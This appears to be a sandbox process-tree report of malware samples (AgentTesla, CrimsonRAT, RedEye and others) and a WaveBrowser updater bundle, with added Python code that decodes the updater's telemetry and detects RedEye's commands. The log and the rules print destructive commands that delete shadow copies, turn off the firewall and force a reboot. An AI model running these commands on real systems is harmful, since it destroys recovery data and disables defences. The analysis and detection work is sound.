C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdater.exe"C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdater.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5160
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:5188
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:5212
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:5232
-
-
-
        C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe
          "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJTV1VwZGF0ZXIiIHVwZGF0ZXJ2ZXJzaW9uPSIxLjMuMTMzLjAiIHNoZWxsX3ZlcnNpb249IjEuMy4xMzMuMCIgaXNtYWNoaW5lPSIwIiBzZXNzaW9uaWQ9IntGMTMyMUQwQi1GMTUxLTQyOUQtODlBRS03NTBFRTk1RkQyNjV9IiB1c2VyaWQ9InthZmRjZDA4Yy0zOGQ1LTQ4YzMtOGYxYS0yYjcyNGNhM2U0MTB9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHJlcXVlc3RpZD0iezlCOUUxQUQ1LTQ2RUMtNDI2QS04QzgxLUI1RDVGMjI4NjBFOH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7RjZGNjBBQ0UtNzFBRC00NjEwLTgwRDQtOTI1MzcyOUZCNEI3fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjEzMy4wIiBsYW5nPSJlbiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMjA1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks whether UAC is enabled
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          PID:5304
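The /ping argument above is URL-safe base64 with the "=" padding stripped; decoded, it is an Omaha-style (protocol 3.0) XML request that reports the updater name and version, a per-user install (ismachine="0"), a persistent user id, and the host's OS and CPU features. The decoder below is an added example written for this page, not code from the report, from Wavesor, or from the sandbox; the blob is copied verbatim from the command line, while the function names and the fields chosen for the summary are this example's own.

```python
# Added example (not part of the sandbox report or of Wavesor's code): decode
# the base64url "/ping" argument that SWUpdater.exe passes in the tree above.
# The blob is copied from the report's command line; the function names and
# the summary fields chosen are this example's own.
import base64
import xml.etree.ElementTree as ET

# Omaha-style updaters send telemetry as base64url-encoded XML with the '='
# padding stripped; this is the argument from the report, verbatim.
PING_BLOB = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJTV1VwZGF0ZXIiIHVwZGF0ZXJ2ZXJzaW9uPSIxLjMuMTMzLjAiIHNoZWxsX3ZlcnNpb249IjEuMy4xMzMuMCIgaXNtYWNoaW5lPSIwIiBzZXNzaW9uaWQ9IntGMTMyMUQwQi1GMTUxLTQyOUQtODlBRS03NTBFRTk1RkQyNjV9IiB1c2VyaWQ9InthZmRjZDA4Yy0zOGQ1LTQ4YzMtOGYxYS0yYjcyNGNhM2U0MTB9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHJlcXVlc3RpZD0iezlCOUUxQUQ1LTQ2RUMtNDI2QS04QzgxLUI1RDVGMjI4NjBFOH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7RjZGNjBBQ0UtNzFBRC00NjEwLTgwRDQtOTI1MzcyOUZCNEI3fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjEzMy4wIiBsYW5nPSJlbiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMjA1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg"
)


def decode_ping(blob: str) -> bytes:
    """Restore the stripped padding, then decode the URL-safe base64 alphabet
    ('-' and '_' instead of '+' and '/')."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.urlsafe_b64decode(padded)


def summarize_ping(raw_xml: bytes) -> dict:
    """Pull the fields a triager wants from the <request> document: who the
    updater claims to be, per-user vs per-machine install, the host
    fingerprint, and which app and event the ping reports."""
    root = ET.fromstring(raw_xml)
    if root.tag != "request":
        raise ValueError(f"unexpected root element {root.tag!r}")
    os_el = root.find("os")
    summary = {
        "protocol": root.get("protocol"),
        "updater": root.get("updater"),
        "updaterversion": root.get("updaterversion"),
        "ismachine": root.get("ismachine"),
        "userid": root.get("userid"),
        "installsource": root.get("installsource"),
        "os": None if os_el is None else (os_el.get("version"), os_el.get("arch")),
        "apps": [],
    }
    for app in root.findall("app"):
        summary["apps"].append({
            "appid": app.get("appid"),
            "nextversion": app.get("nextversion"),
            "events": [
                (ev.get("eventtype"), ev.get("eventresult"), ev.get("errorcode"))
                for ev in app.findall("event")
            ],
        })
    return summary


if __name__ == "__main__":
    xml_bytes = decode_ping(PING_BLOB)
    print(xml_bytes.decode("utf-8"))
    for key, value in summarize_ping(xml_bytes).items():
        print(f"{key}: {value}")
```

The userid and sessionid in the decoded request are stable identifiers the updater sends on every check-in, which is what makes the /ping and the later /handoff line (same sessionid) correlatable in proxy logs.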
        C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe
          "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /handoff "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1" /installsource otherinstallcmd /sessionid "{F1321D0B-F151-429D-89AE-750EE95FD265}"
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks whether UAC is enabled
          - System Location Discovery: System Language Discovery
          PID:5348
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:1
    PID:3780
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6492 /prefetch:8
    PID:5548
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
    PID:6964
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID:6520
  C:\Users\Admin\Downloads\AgentTesla.exe
    "C:\Users\Admin\Downloads\AgentTesla.exe"
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6608
  C:\Users\Admin\Downloads\AgentTesla.exe
    "C:\Users\Admin\Downloads\AgentTesla.exe"
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:7736
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8204 /prefetch:1
    PID:1280
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1
    PID:7780
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8176 /prefetch:8
    PID:5336
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8764 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID:6596
  C:\Users\Admin\Downloads\CrimsonRAT.exe
    "C:\Users\Admin\Downloads\CrimsonRAT.exe"
    - Checks computer location settings
    PID:3624
    C:\ProgramData\Hdlharas\dlrarhsiva.exe
      "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
      - Adds Run key to start application
      PID:6340
  C:\Users\Admin\Downloads\CrimsonRAT.exe
    "C:\Users\Admin\Downloads\CrimsonRAT.exe"
    PID:3300
  C:\Users\Admin\Downloads\CrimsonRAT.exe
    "C:\Users\Admin\Downloads\CrimsonRAT.exe"
    - Checks computer location settings
    PID:5932
    C:\ProgramData\Hdlharas\dlrarhsiva.exe
      "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
      PID:7680
  C:\Users\Admin\Downloads\CrimsonRAT.exe
    "C:\Users\Admin\Downloads\CrimsonRAT.exe"
    - Checks computer location settings
    PID:6308
    C:\ProgramData\Hdlharas\dlrarhsiva.exe
      "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
      PID:6472
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
    PID:3984
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8424 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID:4820
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8232 /prefetch:8
    PID:7436
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1716 /prefetch:1
    PID:7416
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5332 /prefetch:8
    PID:212
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8420 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID:7808
  C:\Users\Admin\Downloads\RedEye.exe
    "C:\Users\Admin\Downloads\RedEye.exe"
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3032
  C:\Users\Admin\Downloads\RedEye.exe
    "C:\Users\Admin\Downloads\RedEye.exe"
    PID:816
  C:\Users\Admin\Downloads\RedEye.exe
    "C:\Users\Admin\Downloads\RedEye.exe"
    - Modifies Windows Defender Real-time Protection settings
    - UAC bypass
    - Disables RegEdit via registry modification
    - Event Triggered Execution: Image File Execution Options Injection
    - Checks computer location settings
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops autorun.inf file
    - Sets desktop wallpaper using registry
    - Drops file in Windows directory
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - System policy modification
    PID:6284
    C:\Windows\SYSTEM32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      - Interacts with shadow copies
      PID:540
    C:\Windows\SYSTEM32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      - Interacts with shadow copies
      PID:3056
    C:\Windows\SYSTEM32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      - Interacts with shadow copies
      PID:6068
    C:\Windows\SYSTEM32\NetSh.exe
      NetSh Advfirewall set allprofiles state off
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      PID:5896
    C:\Windows\System32\shutdown.exe
      "C:\Windows\System32\shutdown.exe" -r -t 00 -f
      PID:4032
  C:\Users\Admin\Downloads\RedEye.exe
    "C:\Users\Admin\Downloads\RedEye.exe"
    PID:6212
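The RedEye.exe instance with PID 6284 above issues, from one parent, three shadow-copy deletions, a firewall-off for every profile, and a forced reboot. Any one of those commands also appears in benign administration; the signal is the combination under a single parent. The rule set below is an added example written for this page, not part of the sandbox's signature engine or any vendor's content: the event tuples are reconstructed from the process tree, and the rule names, regular expressions and ATT&CK mappings are this example's own choices.

```python
# Added example (not part of the sandbox report or of any vendor's detection
# content): turn the child commands RedEye.exe (PID 6284) issues in the tree
# above into per-process findings. The events are reconstructed from the tree;
# the rule names, regexes and ATT&CK mappings are this example's own choices.
import re
from collections import defaultdict

# (finding, ATT&CK technique, pattern matched against the command line)
RULES = [
    ("Deletes volume shadow copies", "T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
    ("Turns off Windows Firewall for every profile", "T1562.004",
     re.compile(r"\bnetsh(?:\.exe)?\b.*\badvfirewall\b.*\bset\b.*\ballprofiles\b"
                r".*\bstate\s+off\b", re.I)),
    ("Forces an immediate reboot or shutdown", "T1529",
     re.compile(r"\bshutdown(?:\.exe)?\b.*\s[-/][rs](?:\s|$)", re.I)),
]

# Constructed from the report's process tree: (pid, parent pid, image, command line).
# None marks a parent that lies outside the excerpt.
EVENTS = [
    (6284, None, r"C:\Users\Admin\Downloads\RedEye.exe",
     r'"C:\Users\Admin\Downloads\RedEye.exe"'),
    (540, 6284, r"C:\Windows\SYSTEM32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    (3056, 6284, r"C:\Windows\SYSTEM32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    (6068, 6284, r"C:\Windows\SYSTEM32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    (5896, 6284, r"C:\Windows\SYSTEM32\NetSh.exe", "NetSh Advfirewall set allprofiles state off"),
    (4032, 6284, r"C:\Windows\System32\shutdown.exe",
     r'"C:\Windows\System32\shutdown.exe" -r -t 00 -f'),
    # A browser helper from the same report, kept as a negative control.
    (3780, None, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer /prefetch:1'),
]


def match_rules(cmdline: str) -> list:
    """Return the (finding, technique) pairs whose pattern hits this command line."""
    return [(name, tech) for name, tech, rx in RULES if rx.search(cmdline)]


def score_tree(events) -> dict:
    """Attribute every hit to the process that launched the command (the parent),
    falling back to the process itself when its parent is outside the excerpt.
    Result: {owner pid: {technique: hit count}}."""
    known = {pid for pid, _, _, _ in events}
    verdict = defaultdict(lambda: defaultdict(int))
    for pid, ppid, _image, cmdline in events:
        owner = ppid if ppid in known else pid
        for _name, tech in match_rules(cmdline):
            verdict[owner][tech] += 1
    return {pid: dict(hits) for pid, hits in verdict.items()}


def ransomware_prep(verdict: dict, min_distinct: int = 2) -> list:
    """Processes that combine at least `min_distinct` techniques. A single
    vssadmin call is noisy on its own; shadow deletion plus firewall-off plus
    a forced reboot from one parent is the pattern this report shows."""
    return sorted(pid for pid, hits in verdict.items() if len(hits) >= min_distinct)


if __name__ == "__main__":
    verdict = score_tree(EVENTS)
    for pid, hits in verdict.items():
        print(f"PID {pid}: {hits}")
    print("ransomware-style preparation by:", ransomware_prep(verdict))
```

Attributing to the parent rather than the child matters for response: the vssadmin.exe, NetSh.exe and shutdown.exe processes are gone within milliseconds, while the RedEye.exe parent is the process to suspend, dump and trace back to its own parent in the tree.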
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID:1304
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID:1584
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 712 -ip 712
  PID:5052
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4532 -ip 4532
  PID:800
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2216 -ip 2216
  PID:3488
C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID:4896
C:\Users\Admin\Downloads\YouAreAnIdiot.exe
  "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4504
  C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 1172
    - Program crash
    PID:428
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4504 -ip 4504
  PID:5080
C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x3a4 0x2d0
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe
  "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" -Embedding
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  PID:5404
  C:\Users\Admin\Wavesor Software\SWUpdater\Install\{480227C2-19ED-43C9-A26E-D7C3AA146748}\WaveInstaller-v1.5.18.2.exe
    "C:\Users\Admin\Wavesor Software\SWUpdater\Install\{480227C2-19ED-43C9-A26E-D7C3AA146748}\WaveInstaller-v1.5.18.2.exe" /installerdata="C:\Users\Admin\AppData\Local\Temp\guiA28B.tmp"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5748
    C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\wavebrowser.packed.7z" --wid=z51trq3s --installerdata="C:\Users\Admin\AppData\Local\Temp\guiA28B.tmp"
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      PID:5828
      C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe
        C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x258,0x25c,0x260,0x21c,0x264,0x7ff7c45c12d0,0x7ff7c45c12dc,0x7ff7c45c12e8
        - Executes dropped EXE
        PID:5848
      C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe" --verbose-logging --installerdata="C:\Users\Admin\AppData\Local\Temp\guiA28B.tmp" --create-shortcuts=0 --install-level=0
        - Executes dropped EXE
        PID:2892
        C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe
          C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff7c45c12d0,0x7ff7c45c12dc,0x7ff7c45c12e8
          - Executes dropped EXE
          PID:1892
      C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
        "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --install-type=1 --from-installer
        - Checks computer location settings
        - Executes dropped EXE
        - Loads dropped DLL
        - Checks system information in the registry
        - Drops file in Program Files directory
        - Enumerates system info in registry
        - Modifies data under HKEY_USERS
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SendNotifyMessage
        PID:3796
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ffd834eccf0,0x7ffd834eccfc,0x7ffd834ecd08
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5572
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2044,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2040 /prefetch:2
          - Executes dropped EXE
          - Loads dropped DLL
          PID:1056
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --start-stack-profiler --field-trial-handle=1936,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2112 /prefetch:3
          - Executes dropped EXE
          - Loads dropped DLL
          PID:3760
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2284 /prefetch:8
          - Executes dropped EXE
          - Loads dropped DLL
          PID:4680
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3000,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3396 /prefetch:1
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5716
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3008,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3236 /prefetch:2
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:1472
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3952,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4008 /prefetch:8
          - Checks computer location settings
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5884
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
          "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4532,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4560 /prefetch:8
          - Executes dropped EXE
          - Loads dropped DLL
          PID:5152
        C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe
